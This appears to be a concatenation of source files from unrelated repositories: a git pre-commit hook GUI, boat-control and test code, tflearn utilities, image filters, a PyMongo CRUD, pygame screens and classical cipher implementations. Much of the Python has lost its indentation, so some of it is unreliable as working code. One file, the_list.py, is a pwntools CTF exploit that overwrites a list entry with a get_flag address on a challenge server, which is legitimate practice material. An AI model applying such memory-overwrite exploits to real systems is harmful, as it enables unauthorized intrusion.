tk.Button(self.top_right, text="Exit").grid(row=0, column=1, sticky=tk.E)
tk.Button(self.top_right, text="Commit").grid(row=0, column=2, sticky=tk.E, padx = 20, pady = 10)
tk.Button(self.top_right, text="Commit & Push").grid(row=0, column=3, sticky=tk.E)
def SummaryFrame(self,localPath="",RemotePath="",Author="",AuthorEmail = "",CommFiles ="",Notify="",Request=""):
#Summary frame widgets
#Geometry
self.sum_left = tk.Frame(self.framesum)
self.sum_right = tk.Frame(self.framesum, padx=50, pady=3)
#
self.sum_left.grid(row=0, column=0, sticky="ns")
self.sum_right.grid(row=0, column=1, sticky="ns")
#left panel
tk.Label(self.sum_left, text="Author: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='w')
tk.Label(self.sum_left, text= Author + " <" +AuthorEmail +">", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=1, sticky='w')
#
tk.Label(self.sum_left, text="Notify to: " , anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=0, sticky='w')
mailLog = tk.Entry(self.sum_left)
mailLog.insert(0, Notify)
mailLog.grid(row=1,column=1,sticky='w')
#
tk.Label(self.sum_left, text="Request approval to: " , anchor = tk.W, justify = tk.LEFT, ).grid(row=2, column=0, sticky='w')
approvalLog = tk.Entry(self.sum_left)
approvalLog.insert(0, Request)
approvalLog.grid(row=2,column=1,sticky='w')
#
#right panel
tk.Label(self.sum_right, text="Remote Repo: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='w')
tk.Label(self.sum_right, text= remotePath, anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=1, sticky='w')
tk.Label(self.sum_right, text="Local Repo: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=0, sticky='w')
tk.Label(self.sum_right, text= localPath, anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=1, sticky='w')
#botton code
tk.Label(self.framesum, text="Files Being Commited: " + CommFiles, anchor = tk.W, justify = tk.LEFT ).grid(row=1, column=0, sticky='w')
tk.Label(self.framesum, text="Commit Message: ", anchor = tk.W, justify = tk.LEFT ).grid(row=2, column=0, sticky='w')
tk.Label(self.framesum, text="Email Message: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=3, column=0, sticky='w')
tk.Text(self.framesum, height=3, width=70).grid(row=4, columnspan = 4)
def TestFrame(self):
#Testing window
self.test_left = tk.Frame(self.frametest)
self.test_right = tk.Frame(self.frametest, padx=50, pady=3)
self.test_left.columnconfigure(0, weight=1)
self.test_right.columnconfigure(0, weight=1)
self.test_left.grid(row=0, column=0, sticky="ns")
self.test_right.grid(row=0, column=1, sticky="ns")
tk.Label(self.test_left, text="Code Complexity: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
tk.Label(self.test_left, text="Run Linter: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=0, sticky='e')
tk.Button(self.test_left, text="OK").grid(row=1, column=1, sticky='w')
tk.Label(self.test_left, text="Run Scenario Tools: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=2, column=0, sticky='e')
tk.Button(self.test_left, text="OK").grid(row=2, column=1, sticky='w')
tk.Label(self.test_left, text="Update Doc: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=3, column=0, sticky='e')
tk.Button(self.test_left, text="OK").grid(row=3, column=1, sticky='w')
tk.Label(self.test_right, text="Run Tests: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
tk.Button(self.test_right, text="OK").grid(row=0, column=1, sticky='w')
def DiffFrame(self,diffLog=""):
#Diff window
tk.Label(self.framediff, text="Code Diff: \n \n" + diffLog, anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
#get information:
localPath = os.getcwd()
vv = subprocess.Popen('git config --get remote.origin.url', stdout = subprocess.PIPE)
remotePath = vv.stdout.read().decode('utf-8', 'replace').strip()
vv = subprocess.Popen('git config user.name', stdout = subprocess.PIPE)
Author = vv.stdout.read().decode('utf-8', 'replace').strip()
vv = subprocess.Popen('git config user.email', stdout = subprocess.PIPE)
AuthorEmail = vv.stdout.read().decode('utf-8', 'replace').strip()
##note, diff --cached because code has being staged (added) at this point.
vv = subprocess.Popen('git diff --cached --name-only', stdout = subprocess.PIPE)
CommFiles = vv.stdout.read().decode('utf-8', 'replace').strip()
CommFiles = CommFiles.replace("\n",", ")
vv = subprocess.Popen('git diff --cached', stdout = subprocess.PIPE)
diffLog = vv.stdout.read().decode('utf-8', 'replace').strip()
#try to read the mailing list and request list - else create them (w+)
with open('.git/hooks/hooks.mailinglist','a+') as maillist, open('.git/hooks/hooks.approvallist','a+') as approvallist:
maillist.seek(0)
approvallist.seek(0)
Notify = maillist.read()
Request = approvallist.read()
#start GUI
root = tk.Tk()
app = Application(master=root)
app.SummaryFrame(localPath,remotePath,Author,AuthorEmail,CommFiles,Notify,Request)
app.DiffFrame(diffLog)
app.mainloop()
print("****** End of Pre-Commit Hook ******","\n")
``` |
{
"source": "jjoyce0510/autonomous-shipping-vessel",
"score": 3
} |
#### File: main/python/BluetoothManager.py
```python
from bluetooth import *
class BluetoothManager:
hasData = False
data = ""
def __init__(self):
# Create the server
self.serverSock = BluetoothSocket(RFCOMM)
self.serverSock.bind(("", PORT_ANY))
self.serverSock.listen(1)
self.port = self.serverSock.getsockname()[1]
self.uuid = "94f39d29-7d6d-437d-973b-fba39e49d4ee"
self.startServer()
def startServer(self):
advertise_service(self.serverSock, "SampleServer", service_id = self.uuid,
service_classes = [ self.uuid, SERIAL_PORT_CLASS ], profiles = [ SERIAL_PORT_PROFILE ])
print("Waiting for connection on RFCOMM channel %d" % self.port)
self.waitForConnection()
def connect(self):
while not self.hasData:
clientSock, clientInfo = self.serverSock.accept()
print("Accepted connection from ", clientInfo)
try:
while True:
newData = clientSock.recv(1024)
self.data = self.data + newData
if len(newData) == 0: break
else: self.hasData = True
except IOError:
pass
print("Disconnected.")
clientSock.close()
def getData(self):
return self.data
def hasData(self):
return self.hasData()
```
#### File: python/control/Object.py
```python
class Object:
distanceInCm = None
radProp = 0.0
angleFromCenter = 0.0
# This probably not always reliable, unless we are going straight into something.
def getDistance(self):
return self.distanceInCm
def setDistance(self, dist):
self.distanceInCm = dist
def setRadiusProportion(self, radProp):
self.radProp = radProp
def setAngleFromCenter(self, angleFromCenter):
self.angleFromCenter = angleFromCenter
def getAngleFromCenter(self):
return self.angleFromCenter
def getRadiusProportion(self):
return self.radProp
def isValid(self):
return self.distanceInCm is not None or self.radProp is not None or self.angleFromCenter is not None
```
#### File: python/control/VesselControls.py
```python
class VesselControls:
servo = None
motor = None
def __init__(self, motor, servo):
self.motor = motor
self.servo = servo
def getCurrentVelocity(self):
return self.motor.getVelocity()
def getCurrentAngle(self):
return self.servo.getAngle()
def setVelocity(self, velocity):
if self.motor.getVelocity() is not velocity:
self.motor.setVelocity(velocity)
def setAngle(self, angle):
self.servo.setAngle(angle)
def setAngleAndVelocity(self, angle, velocity):
self.setAngle(angle)
self.setVelocity(velocity)
def startMotor(self):
self.motor.start()
def stopMotor(self):
self.motor.stop()
```
#### File: test/python/TestCoordinates.py
```python
from src.main.python.wrappers.gps.Coordinates import Coordinates
# Created by <NAME> on November 27, 2017
class TestCoordinates:
def __init__(self):
self.coord_0 = Coordinates(0,0)
self.coord_1 = Coordinates(1,2)
self.coord_2 = Coordinates(0,0)
self.coord_3 = Coordinates(4,6)
self.coord_4 = Coordinates(1,1)
self.coord_5 = Coordinates(-1,-1)
self.coord_6 = Coordinates(1,-1)
self.coord_7 = Coordinates(-1,1)
self.coord_8 = Coordinates(0,1)
self.coord_9 = Coordinates(1,0)
self.coord_10 = Coordinates(-1,0)
self.coord_11 = Coordinates(0,-1)
self.coord_tests()
def coord_tests(self):
assert(self.test_getLat())
assert(self.test_getLon())
assert(self.test_setLat())
assert(self.test_setLon())
assert(self.test_calculateDistanceTo())
assert(self.test_calculateAngleFrom())
assert(self.test_calculateRotation())
print "Coordinates Tests Completed"
def test_getLat(self):
if self.coord_0.getLat() != 0:
return False
if self.coord_1.getLat() != 1:
return False
return True
def test_getLon(self):
if self.coord_0.getLon() != 0:
return False
if self.coord_1.getLon() != 2:
return False
return True
def test_setLat(self):
if self.coord_2.getLat() != 0:
return False
self.coord_2.setLat(3)
if self.coord_2.getLat() != 3:
return False
return True
def test_setLon(self):
if self.coord_2.getLon() != 0:
return False
self.coord_2.setLon(4)
if self.coord_2.getLon() != 4:
return False
return True
def test_calculateDistanceTo(self):
if self.coord_1.calculateDistanceTo(self.coord_3) != 5.0:
return False
return True
def test_calculateAngleFrom(self):
out = self.coord_1.calculateAngleFrom(self.coord_3)
if out < 53.1 or out > 53.2:
return False
if self.coord_0.calculateAngleFrom(self.coord_4) != 45:
return False
if self.coord_0.calculateAngleFrom(self.coord_5) != -135:
return False
if self.coord_0.calculateAngleFrom(self.coord_6) != -45:
return False
if self.coord_0.calculateAngleFrom(self.coord_7) != 135:
return False
if self.coord_0.calculateAngleFrom(self.coord_8) != 90:
return False
if self.coord_0.calculateAngleFrom(self.coord_9) != 0:
return False
if self.coord_0.calculateAngleFrom(self.coord_10) != 180:
return False
if self.coord_0.calculateAngleFrom(self.coord_11) != -90:
return False
return True
def test_calculateRotation(self):
if self.coord_0.calculateRotation(0, 45) != 45:
return False
if self.coord_0.calculateRotation(-45, 45) != 90:
return False
if self.coord_0.calculateRotation(-180, 45) != -135:
return False
if self.coord_0.calculateRotation(50, 45) != -5:
return False
if self.coord_0.calculateRotation(50, 90) != 40:
return False
if self.coord_0.calculateRotation(180, 190) != 10:
return False
if self.coord_0.calculateRotation(270, 0) != 90:
return False
if self.coord_0.calculateRotation(270, 89) != 179:
return False
if self.coord_0.calculateRotation(720, 1081) != 1:
return False
if self.coord_0.calculateRotation(0, 180) != 180:
return False
if self.coord_0.calculateRotation(180, 0) != -180:
return False
if self.coord_0.calculateRotation(315, -10) != 35:
return False
if self.coord_0.calculateRotation(315, 45) != 90:
return False
if self.coord_0.calculateRotation(315, -90) != -45:
return False
return True
```
#### File: test/python/TestLidar.py
```python
from src.main.python.wrappers.lidar.Lidar import Lidar
from src.main.python.exceptions.HardwareException import HardwareException
class TestLidar:
lidar = Lidar()
def __init__(self):
dist = self.lidar.getDistance()
print "Distance: " + str(dist)
if dist <= 0.0:
raise HardwareException
```
#### File: test/python/TestMotor.py
```python
from src.main.python.wrappers.motor.MotorController import MotorController
from src.main.python.exceptions.HardwareException import HardwareException
import time
class TestMotor:
motorController = MotorController()
def __init__(self):
self.testVelocity()
def testVelocity(self):
self.motorController.start()
self.motorController.setVelocity(0.0)
print self.motorController.getVelocity()
time.sleep(4.0)
self.motorController.setVelocity(30.0)
print self.motorController.getVelocity()
time.sleep(7.0)
self.motorController.stop()
``` |
{
"source": "jjpalacio/tflearn",
"score": 3
} |
#### File: tflearn/tests/test_objectives.py
```python
import tflearn
import unittest
import numpy as np
import tensorflow as tf
class TestObjectives(unittest.TestCase):
"""
Testing objective functions from tflearn/objectives
"""
def test_weak_cross_entropy_2d(self):
"""
Test tflearn.objectives.weak_cross_entropy_2d
"""
num_classes = 2
batch_size = 3
height, width = 5, 5
shape = (batch_size, height, width, num_classes)
y_pred = np.random.random(shape).astype(np.float32)
target = np.random.randint(0, num_classes, np.prod(shape[:-1]))
# convert to one-hot encoding
y_true = np.eye(num_classes)[target].reshape(shape)
with tf.Graph().as_default():
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.convert_to_tensor(y_true)
loss = tflearn.objectives.weak_cross_entropy_2d(y_pred, y_true)
with tf.Session() as sess:
res = sess.run(loss)
self.assertGreater(res, 0.)
self.assertLess(res, 1.)
if __name__ == "__main__":
unittest.main()
```
#### File: tflearn/tflearn/regularizers.py
```python
from __future__ import division, print_function, absolute_import
import tensorflow as tf
from .utils import get_from_module
def get(identifier):
if hasattr(identifier, '__call__'):
return identifier
else:
return get_from_module(identifier, globals(), 'regularizer')
def L2(tensor, wd=0.001):
""" L2.
Computes half the L2 norm of a tensor without the `sqrt`:
output = sum(t ** 2) / 2 * wd
Arguments:
tensor: `Tensor`. The tensor to apply regularization.
wd: `float`. The decay.
Returns:
The regularization `Tensor`.
"""
return tf.multiply(tf.nn.l2_loss(tensor), wd, name='L2-Loss')
def L1(tensor, wd=0.001):
""" L1.
Computes the L1 norm of a tensor:
output = sum(|t|) * wd
Arguments:
tensor: `Tensor`. The tensor to apply regularization.
wd: `float`. The decay.
Returns:
The regularization `Tensor`.
"""
return tf.multiply(tf.reduce_sum(tf.abs(tensor)), wd, name='L1-Loss')
``` |
{
"source": "jjpaq/linedraw",
"score": 2
} |
#### File: jjpaq/linedraw/filters.py
```python
from PIL import Image, ImageDraw, ImageOps, ImageFilter
from random import *
import math
F_Blur = {
(-2,-2):2,(-1,-2):4,(0,-2):5,(1,-2):4,(2,-2):2,
(-2,-1):4,(-1,-1):9,(0,-1):12,(1,-1):9,(2,-1):4,
(-2,0):5,(-1,0):12,(0,0):15,(1,0):12,(2,0):5,
(-2,1):4,(-1,1):9,(0,1):12,(1,1):9,(2,1):4,
(-2,2):2,(-1,2):4,(0,2):5,(1,2):4,(2,2):2,
}
F_SobelX = {(-1,-1):1,(0,-1):0,(1,-1):-1,(-1,0):2,(0,0):0,(1,0):-2,(-1,1):1,(0,1):0,(1,1):-1}
F_SobelY = {(-1,-1):1,(0,-1):2,(1,-1):1,(-1,0):0,(0,0):0,(1,0):0,(-1,1):-1,(0,1):-2,(1,1):-1}
def appmask(IM,masks):
PX = IM.load()
w,h = IM.size
NPX = {}
for x in range(0,w):
for y in range(0,h):
a = [0]*len(masks)
for i in range(len(masks)):
for p in masks[i].keys():
if 0<x+p[0]<w and 0<y+p[1]<h:
a[i] += PX[x+p[0],y+p[1]] * masks[i][p]
if sum(masks[i].values())!=0:
a[i] = a[i] / sum(masks[i].values())
NPX[x,y]=int(sum([v**2 for v in a])**0.5)
for x in range(0,w):
for y in range(0,h):
PX[x,y] = NPX[x,y]
``` |
{
"source": "jjpaulo2/crud-pymongo",
"score": 3
} |
#### File: crud/crud/crud_clientes.py
```python
from pymongo import MongoClient
from .crud import CollectionCRUD
class ClientesCRUD(CollectionCRUD):
"""
Classe de CRUD da collection `clientes` do banco `loja`
"""
def __init__(self, mongo_client: MongoClient):
DATABASE = "loja"
COLLECTION = "clientes"
super().__init__(mongo_client, DATABASE, COLLECTION)
```
#### File: crud/tests/test_insert.py
```python
from bson.objectid import ObjectId
from .crud_test_case import CRUDTestCase
class CRUDInsertTestCase(CRUDTestCase):
"""
Casos de teste de inserção
"""
def test_insert_one_document(self) -> None:
"""
Testes do método `CollectionCRUD.insert` que insere
um documento por vez na collection
"""
for cliente in self.clientes:
id = self.clientes_crud.insert(cliente)
type_id = type(id)
self.assertEqual(type_id, ObjectId)
def test_insert_many_documents(self) -> None:
"""
Testes do método `CollectionCRUD.insert_many` que insere
vários documentos por vez na collection
"""
ids = self.clientes_crud.insert_many(self.clientes)
type_ids = [type(id) for id in ids]
for type_id in type_ids:
self.assertEqual(type_id, ObjectId)
``` |
{
"source": "jjpaulo2/gerador-planilha",
"score": 4
} |
#### File: gerador_planilha_desktop/gerador_planilha/__init__.py
```python
from .reader import read_and_format_workbook_to_row_list
from . import writer
def generate_worksheet(input_file: str, output_file: str, window=None):
"""
Função que executa o procedimento do módulo em ordem lógica.
É o método chamado no arquivo `__main__.py`.
Arguments:
input_file (str): string com o caminho do arquivo de entrada
que será lido
output_file (str): string com o caminho do arquivo de saída que
conterá os dados extraídos do arquivo inicial
"""
formated = read_and_format_workbook_to_row_list(input_file, window=window)
writer.generate_workbook_file(formated, output_file, window=window)
``` |
{
"source": "jjpaulo2/sonic-pygame",
"score": 3
} |
#### File: game/telas/TelaDeInicio.py
```python
import pathlib, pygame
class TelaDeInicio:
def __init__(self, tela):
self.fundo_path = str(pathlib.Path(__file__).parent.absolute()) + "/../../img/fundo-menu.jpg"
self.musica_path = str(pathlib.Path(__file__).parent.absolute()) + "/../../audio/title.wav"
self.tela = tela
self.fonte = pygame.font.Font(str(pathlib.Path(__file__).parent.absolute()) + "/../../fonts/ARCADECLASSIC.TTF", 40)
self.press_start = self.fonte.render(" PRESS ENTER ", False, (255,255,255), (30,35,150))
self.EVENTO_PISCAR = pygame.USEREVENT + 1
def tocar_musica(self):
pygame.mixer.music.load(self.musica_path)
pygame.mixer.music.set_volume(0.5)
pygame.mixer.music.play()
def renderizar_fundo(self):
fundo = pygame.image.load(self.fundo_path)
self.tela.blit(fundo, (0,0))
def renderizar_press_start(self):
self.tela.blit(self.press_start, (280,520))
self.press_start_aparecendo = True
def rodar_cenario(self):
self.renderizar_fundo()
self.tocar_musica()
self.rodando = True
self.renderizar_press_start()
pygame.time.set_timer(self.EVENTO_PISCAR, 500)
def atualizar_eventos(self, evento, fase):
if evento.type == self.EVENTO_PISCAR:
if self.press_start_aparecendo:
self.renderizar_fundo()
self.press_start_aparecendo = False
else:
self.renderizar_press_start()
self.press_start_aparecendo = True
if evento.type == pygame.KEYDOWN:
if evento.key == pygame.K_RETURN:
pygame.mixer.music.fadeout(500)
pygame.time.set_timer(self.EVENTO_PISCAR, 0)
self.rodando = False
def atualizar_cenario(self):
pass
``` |
{
"source": "jjpolaczek/CTF_attempts",
"score": 2
} |
#### File: CTF_attempts/NahamCon2021/the_list.py
```python
from pwn import *
get_flag = 0x401369
bin_flag = get_flag.to_bytes(4,'little') + b"\0"*4
bin_short_flag = b"\x69\x13\x40"
override =[]
for i in range(5):
override.append(bin_flag)
override = b"".join(override)
print(override)
tmot = 1.0
io = remote('challenge.nahamcon.com', 32521)
def addUser(name):
io.sendline("2")
print(io.recv(timeout=tmot)) # Prompt
io.sendline(name)
print(io.recv(timeout=tmot)) # User added
print(io.recv(timeout=tmot)) # Menu
def chgName(idx, data):
io.sendline("4")
print(io.recv(timeout=tmot)) # Prompt
io.sendline("%d" % idx)
print(io.recv(timeout=tmot)) # Prompt
io.sendline(data)
print(io.recv(timeout=tmot)) # Sucess
#unused handlers
def printUsers():
io.sendline("1")
print(io.recv(timeout=tmot)) # emptyLine
print(io.recv(timeout=tmot)) # Prompt
def exitProg():
io.sendline("5")
print(io.recv(timeout=tmot)) # Prompt
def delUser(no):
io.sendline("3")
print(io.recv(timeout=tmot)) # Prompt
io.sendline("%d" % no)
print(io.recv(timeout=tmot)) # User deleted
print(io.recv()) # name
io.sendline("kubaa")
print(io.recv(timeout=tmot)) # Welcome name
print(io.recv(timeout=tmot)) # Menu
for i in range(18):
addUser("x")
payload = b"\0"*0x1F + b"\0" + b'\0'*8 + bin_flag
print(hex(len(payload)))
print(payload + b"\0")
chgName(18, payload)
print("\r\n")
io.interactive(2)
``` |
{
"source": "jjpr-mit/mkgu",
"score": 2
} |
#### File: mkgu/mkgu/__init__.py
```python
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
from . import fetch
def get_assembly(name):
return fetch.get_assembly(name)
```
#### File: mkgu/mkgu/presentations.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
class Presentation(object):
"""An instance of presenting a stimulus to a system, to evoke a response. """
def __init__(self, stimulus):
self.stimulus = stimulus
class Stimulus(object):
"""A Stimulus instance represents an input to a system for which data are being recorded. """
def __init__(self):
pass
class StimulusSet(object):
"""A StimulusSet instance represents a set of stimuli associated with a DataAssembly"""
def __init__(self):
pass
``` |
{
"source": "jjpro201/JJPRO_GAME",
"score": 3
} |
#### File: jjpro201/JJPRO_GAME/animation.py
```python
import pygame
#classe occupant des animations
class AnimateSprite(pygame.sprite.Sprite):
#choses a faire a la creation de l'entite
def __init__(self, sprite_name, size=(200, 200)):
super().__init__()
self.size = size
self.image = pygame.image.load(f'assets/{sprite_name}.png')
self.image = pygame.transform.scale(self.image, size)
self.current_image = 0 #commencer l'anim a l'image 0
self.images = animations.get(sprite_name)
self.animation = False
#methode de demaration l'animation
def start_animation(self):
self.animation = True
#definir une methode oiur animer le sprite
def animate(self, loop=False):
#passer a l'image suivante
if self.animation:
#passer a l'image suivante
self.current_image += 1
#verifie atteinte de la fin
if self.current_image >= len(self.images):
#remetre l'animation au depart
self.current_image = 0
#verifier si l'animation n'est pas en boucle
if loop is False:
# desactivation de l'animation
self.animation = False
#modifier l'image precedente par la suivante
self.image = self.images[self.current_image]
self.image = pygame.transform.scale(self.image, self.size)
#fonction pour charger les images spirte
def load_animation_images(sprite_ame):
#charger lees images de ce sprite dans le dossier correspondant
images = []
#recupere le chemin du dossier pour un sprite
path = f"assets/{sprite_ame}/{sprite_ame}"
#boucler sur chaque image de ce dossier
for num in range(1, 24):
image_path = path + str(num) + '.png'
images.append(pygame.image.load(image_path))
#renvoyer le contenu
return images
#definir un dictionnaire contenir les images chager de chauqe image
animations ={
'mummy': load_animation_images('mummy'),
'player': load_animation_images('player'),
'alien': load_animation_images('alien')
}
```
#### File: jjpro201/JJPRO_GAME/sounds.py
```python
import pygame
class SoundManager:
def __init__(self):
self.sounds = {
'click': pygame.mixer.Sound("assets/sounds/click.ogg"),
'game_over': pygame.mixer.Sound("assets/sounds/game_over.ogg"),
'meteorite': pygame.mixer.Sound("assets/sounds/meteorite.ogg"),
'tir': pygame.mixer.Sound("assets/sounds/tir.ogg")
}
def play(self, name):
self.sounds[name]
``` |
{
"source": "JJP-SWFC/Self-Checking-Binary-Code",
"score": 3
} |
#### File: JJP-SWFC/Self-Checking-Binary-Code/selfchecking1.py
```python
from tkinter import *
import numpy as np
import random
#generates a random 16 digits
digtexts = np.random.randint(2, size=16)
q1check = 0
q2check = 0
q3check = 0
q4check = 0
q5check = 0
#The function to swap 1s to 0s, it is used as the button command
def flipper0():
#Probably an awful way of swapping a 1 to a 0 but oh well
dig0["text"] = (str(int((not bool(int(dig0["text"]))))))
def flipper1():
dig1["text"] = (str(int((not bool(int(dig1["text"]))))))
def flipper2():
dig2["text"] = (str(int((not bool(int(dig2["text"]))))))
def flipper4():
dig4["text"] = (str(int((not bool(int(dig4["text"]))))))
def flipper8():
dig8["text"] = (str(int((not bool(int(dig8["text"]))))))
def checkAnswer():
global q1check, q2check, q3check, q4check, q5check
#sets the checks to a new variable so I can put them back afterwards
oldq1 = q1check
oldq2 = q2check
oldq3 = q3check
oldq4 = q4check
oldq5 = q5check
#Sets each label or button to the default background
dig0["background"] = "SystemButtonFace"
dig1["background"] = "SystemButtonFace"
dig2["background"] = "SystemButtonFace"
dig3["background"] = "SystemButtonFace"
dig4["background"] = "SystemButtonFace"
dig5["background"] = "SystemButtonFace"
dig6["background"] = "SystemButtonFace"
dig7["background"] = "SystemButtonFace"
dig8["background"] = "SystemButtonFace"
dig9["background"] = "SystemButtonFace"
dig10["background"] = "SystemButtonFace"
dig11["background"] = "SystemButtonFace"
dig12["background"] = "SystemButtonFace"
dig13["background"] = "SystemButtonFace"
dig14["background"] = "SystemButtonFace"
dig15["background"] = "SystemButtonFace"
#Gets the text of each of the buttons
selzero = dig0["text"]
selone = dig1["text"]
seltwo = dig2["text"]
selfour = dig4["text"]
seleight = dig8["text"]
#adds the 1s to the total if the selection is a 1
q1check += int(selone)
q2check += int(seltwo)
q3check += int(selfour)
q4check += int(seleight)
q5check += int(selzero) + int(selone) + int(seltwo) + int(selfour) + int(seleight)
if q1check%2 != 0:
print("Check the first selection box")
#Highlights the boxes for this selection
dig1["background"] = "light blue"
dig5["background"] = "light blue"
dig9["background"] = "light blue"
dig13["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q2check%2 != 0:
print("Check the second selection box")
dig2["background"] = "light blue"
dig6["background"] = "light blue"
dig10["background"] = "light blue"
dig14["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q3check%2 != 0:
print("Check the third selection box")
dig4["background"] = "light blue"
dig5["background"] = "light blue"
dig6["background"] = "light blue"
dig7["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q4check%2 != 0:
print("Check the final selection box")
dig8["background"] = "light blue"
dig9["background"] = "light blue"
dig10["background"] = "light blue"
dig11["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q5check %2 != 0:
print("You have an odd number of 1s")
else:
print("Well done! You got it right!")
#Puts the checks back to their previous state
q1check = oldq1
q2check = oldq2
q3check = oldq3
q4check = oldq4
q5check = oldq5
if __name__ == "__main__":
#The name of the main thing
gui = Tk()
#Adds the "check answer" button
checkmyanswer = Button(gui, text="Check Answer", command=checkAnswer)
#Add all the buttons and put them in their place "pady" adds vertical space
dig0 = Button(gui, text=digtexts[0], command=flipper0)
dig1 = Button(gui, text=digtexts[1], command=flipper1)
dig2 = Button(gui, text=digtexts[2], command=flipper2)
dig4 = Button(gui, text=digtexts[4], command=flipper4)
dig8 = Button(gui, text=digtexts[8], command=flipper8)
dig0.grid(row=0,column=0,pady=5)
dig1.grid(row=0,column=1)
dig2.grid(row=0,column=2)
dig4.grid(row=1,column=0)
dig8.grid(row=2,column=0,pady=5)
#Make all the rest random, also probably horribly inefficient but it's not a big code so it's fine for now
dig3 = Label(gui, text=digtexts[3])
dig5 = Label(gui, text=digtexts[5])
dig6 = Label(gui, text=digtexts[6])
dig7 = Label(gui, text=digtexts[7])
dig9 = Label(gui, text=digtexts[9])
dig10 = Label(gui, text=digtexts[10])
dig11 = Label(gui, text=digtexts[11])
dig12 = Label(gui, text=digtexts[12])
dig13 = Label(gui, text=digtexts[13])
dig14 = Label(gui, text=digtexts[14])
dig15 = Label(gui, text=digtexts[15])
#Sets all of the positions of each label
dig3.grid(row=0,column=3)
dig5.grid(row=1,column=1)
dig6.grid(row=1,column=2)
dig7.grid(row=1,column=3)
dig9.grid(row=2,column=1)
dig10.grid(row=2,column=2)
dig11.grid(row=2,column=3)
dig12.grid(row=3,column=0)
dig13.grid(row=3,column=1)
dig14.grid(row=3,column=2)
dig15.grid(row=3,column=3)
#Makes sure that "checkanswer" spans across all 4 columns and also has a bit of space from the text
checkmyanswer.grid(row=4, columnspan=4, pady=5)
#Numbers 0 through to 15
for i in range(16):
#Checks that i is not a power of 2
if (not (i & (i-1) == 0)):
#Checks if the last digit is a 1
if (str(format(i,"04b"))[3]) == "1":
if digtexts[i] == 1:
q1check += 1
#Checks if the second to last digit is a 1
if (str(format(i,"04b"))[2]) == "1":
if digtexts[i] == 1:
q2check += 1
#Checks if the third to last digit is a 1
if (str(format(i,"04b"))[1]) == "1":
if digtexts[i] == 1:
q3check += 1
#Checks if the fourth to last digit is a 1
if (str(format(i,"04b"))[0]) == "1":
if digtexts[i] == 1:
q4check += 1
#Just checks all of the 1s that aren't the "selector" ones
if digtexts[i] == 1:
q5check += 1
#Runs the system
gui.mainloop()
``` |
{
"source": "jjpulidos/Crypto-UNAL-2020",
"score": 4
} |
#### File: Crypto-UNAL-2020/Hill/HillCipher.py
```python
import numpy as np
from sympy import Matrix
class HillCipher:
def __init__(self, message, matrix_list):
self.alphabet = {chr(i): i - 97 for i in range(97, 123)}
self.message = message
self.matrix = matrix_list
self.message_numbers = np.array([self.alphabet[x] for x in message]).reshape((-1, 2))
def cipher_decipher(self, to_cipher):
ciphered_message = ""
if to_cipher:
for vector in self.message_numbers:
for i in (vector @ self.matrix) % 26:
ciphered_message += chr(i+97)
return ciphered_message
else:
deciphered_message = ""
try:
inverse = np.array(Matrix(self.matrix).inv_mod(26))
for vector in self.message_numbers:
for i in (vector @ inverse) % 26:
deciphered_message += chr(i + 97)
except Exception:
raise Exception("Not invertible matrix")
return deciphered_message
def main():
message = input("Insert Message:\n")
# message = "JULY"
matrix = []
print("Consider the positions of the key matrix as follows: \n")
print("(1 2")
print(" 3 4)")
print()
for i in range(4):
matrix.append(int(input("Insert Value in the position " + str(i) + " of the matrix key: \n")))
matrix = np.array(matrix).reshape((2, 2))
print()
cipher = HillCipher(message.lower().replace(" ", ""), matrix)
ciphered_message = cipher.cipher_decipher(1)
print("Ciphered Message:", ciphered_message)
decipher = HillCipher(ciphered_message.lower().replace(" ", ""), matrix)
deciphered_message = decipher.cipher_decipher(0)
print("Deciphered message:", deciphered_message)
if __name__ == '__main__':
main()
```
#### File: Crypto-UNAL-2020/PlayFairCipher/main.py
```python
import collections
import numpy as np
def Diff(li1, li2):
return (list(set(li1) - set(li2)))
class PlayFair:
def __init__(self, message, key, action):
self.message = message.lower()
self.message = self.message.replace(" ", "")
self.action = action
for i in range(0, int(len(self.message) / 2), 2):
if self.message[i] == self.message[i + 1]:
self.message = self.message[:i + 1] + 'x' + self.message[i + 1:]
if (len(self.message) % 2 != 0):
self.message += "x"
self.key = key.lower()
self.key = self.key.replace(" ", "")
self.key_without_repetition = list(collections.OrderedDict.fromkeys(self.key).keys())
self.alfabeto_no_presente = Diff(
[chr(x) if chr(x) != 'j' else 'ij' if chr(x) == 'i' else None for x in range(97, 123)],
self.key_without_repetition)
self.alfabeto_no_presente = [x for x in self.alfabeto_no_presente if x is not None]
self.alfabeto_no_presente.sort()
def init_square(self):
self.square = np.zeros((5, 5))
tam_list = len(self.key_without_repetition)
tmp_list = np.array(self.key_without_repetition[:tam_list] + self.alfabeto_no_presente[:(25 - tam_list)])
self.square = np.reshape(tmp_list, (5, 5))
self.dict_col = {}
self.dict_row = {}
for i in range(0, 5):
for j in range(0, 5):
self.dict_col[self.square[i][j]] = j
self.dict_row[self.square[i][j]] = i
self.dict_col["j"] = self.dict_col["i"]
self.dict_row["j"] = self.dict_row["i"]
